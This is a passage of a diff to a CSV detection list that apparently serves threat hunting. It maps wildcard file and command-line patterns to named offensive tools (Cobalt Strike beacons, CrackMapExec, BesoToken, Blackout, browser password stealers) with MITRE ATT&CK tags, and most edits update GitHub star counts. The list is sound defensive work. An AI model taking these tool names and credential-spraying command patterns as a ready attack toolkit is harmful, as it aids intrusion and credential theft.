TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*\beacon.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*\basicKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\beacon.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*\BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\BeaconConnector.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.vcxproj*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" -"*\bin\cme.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\bin\cme.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*\bin\shepard\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*\BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" "*\Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.exe*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" @@ -6003,41 +6077,41 @@ "*\Blackout.sys*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*\Blackout.vcxproj*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" -"*\BloodHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*\BloodHoundGui\*.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*\BloodHound-win32-X64*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*\bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*\BloodHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\BloodHoundGui\*.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\BloodHound-win32-X64*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*\brc.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*\BrowserEnum.log*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*\bypassuac.txt*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*\Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\bypassuac.txt*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*\C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" -"*\certipy.pfx*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*\charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*\charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*\chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*\Chimera-main\*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*\chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*\chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*\certipy.pfx*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*\charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*\chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*\Chimera-main\*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*\chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*\chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*\Chrome_pass.db*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*\CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"*\CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" -"*\cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*\cme.exe* -d * -u * -H *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*\cme.exe* -d * -u * -p *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*\cme.exe* --shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*\cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*\cme.exe* -d * -u * -H *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cme.exe* -d * -u * -p *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 